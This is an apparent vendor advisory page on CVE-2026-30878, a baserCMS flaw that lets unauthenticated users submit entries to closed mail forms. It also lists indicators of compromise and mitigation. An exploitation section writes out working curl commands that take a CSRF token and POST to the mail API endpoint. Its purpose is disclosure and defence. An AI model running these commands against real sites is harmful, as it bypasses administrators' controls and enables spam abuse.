CVE-2026-30878: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-30878 is a mail form acceptance bypass vulnerability in baserCMS, a PHP-based website development framework. Prior to version 5.2.3, a public mail submission API endpoint allows unauthenticated users to submit mail form entries even when the corresponding form has been administratively disabled or closed. The vulnerability was published on March 30–31, 2026, and patched in version 5.2.3. It carries a CVSS v3.1 base score of 5.3 (Medium) (GitHub Advisory, baserCMS Security).

Technical details

The root cause is improper authorization (CWE-285): the public API endpoint plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add() does not invoke the MailFrontService::isAccepting() check that is enforced in the front-end UI flow via MailController::index() and MailController::confirm(). As a result, the API accepts mail form submissions regardless of the form's configured acceptance state (e.g., outside its publish window or explicitly closed by an administrator). Exploitation requires no authentication — only a valid CSRF cookie and token pair obtained by a simple GET request to the site root is sufficient to submit a POST request to /baser/api/bc-mail/mail_messages/add/<form_id>.json (GitHub Advisory).

Impact

Successful exploitation allows unauthenticated remote attackers to bypass administrative controls and submit mail form entries to a disabled or closed form, enabling spam campaigns, operational disruption, and abuse of the site's mail infrastructure. There is no confidentiality or availability impact; the integrity impact is limited to unauthorized data insertion into the mail message store. Administrators who rely on form acceptance settings for maintenance windows, incident response, or spam mitigation are directly undermined by this bypass (GitHub Advisory).

Exploitability

A proof-of-concept exploit consisting of concrete curl commands is publicly documented in the official GitHub Security Advisory, demonstrating the full exploitation sequence including CSRF token acquisition and API submission (GitHub Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.047% (0.02% per GitHub Advisory), indicating a low near-term exploitation probability. No threat actor attribution has been reported.

Exploitation steps

  1. Reconnaissance: Identify a baserCMS instance running version 5.2.2 or earlier. Confirm the presence of the mail plugin by browsing to a mail form page on the target site.
  2. Verify form is disabled: Confirm via the admin UI or by attempting a normal UI submission that the target mail form is not currently accepting submissions.
  3. Obtain CSRF cookie: Send a GET request to the site root to receive a session cookie containing the CSRF token:
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://<target>/'
  1. Extract CSRF token: Parse the csrfToken value from the saved cookie file (/tmp/basercms_cookies.txt).
  2. Submit bypass request: POST directly to the public API endpoint, supplying the CSRF token and form field data:
curl -sS -D - -o - -X POST 'http://<target>/baser/api/bc-mail/mail_messages/add/1.json' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://<target>/' \
  -H 'X-CSRF-Token: <extracted_token>' \
  -b /tmp/basercms_cookies.txt \
  --data-urlencode 'name_1=Test' \
  --data-urlencode 'name_2=User' \
  --data-urlencode 'email_1=attacker@example.com' \
  --data-urlencode 'email_2=attacker@example.com' \
  --data-urlencode 'message=Spam or abuse content'
  1. Confirm success: A 200 OK response confirms the mail message was created despite the form being closed, achieving unauthorized mail submission (GitHub Advisory).

Indicators of compromise

  • Network: Unexpected POST requests to /baser/api/bc-mail/mail_messages/add/<id>.json from unauthenticated or unknown IP addresses, especially when the corresponding mail form is administratively disabled.
  • Logs: Web server access logs showing repeated POST requests to the MailMessagesController API endpoint with 200 OK responses during periods when the form should be rejecting submissions; requests originating from automated tools (e.g., curl user-agent strings).
  • Application: Unexpected mail message entries appearing in the baserCMS admin mail inbox or database (mail_messages table) timestamped during form closure periods.
  • Network: High-volume POST requests to the API endpoint from a single IP or distributed IPs indicative of spam automation (GitHub Advisory).

Mitigation and workarounds

Upgrade baserCMS to version 5.2.3 or later, which patches this vulnerability by adding the MailFrontService::isAccepting() check to the public API endpoint (baserCMS Release, baserCMS Security). As a temporary workaround until patching is possible, implement network-level access controls (e.g., WAF rules or firewall policies) to restrict access to the /baser/api/bc-mail/mail_messages/add/ endpoint, or disable the API entirely if not required for legitimate use. Organizations should also monitor mail message logs for anomalous submissions during form closure periods.

Community reactions

The vulnerability was reported by security researcher melonattacker and disclosed responsibly through the baserCMS GitHub Security Advisory process. The baserCMS development team patched the issue in version 5.2.3, released on March 26, 2026, alongside eight other CVEs including OS command injection and XSS vulnerabilities (baserCMS Release). No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management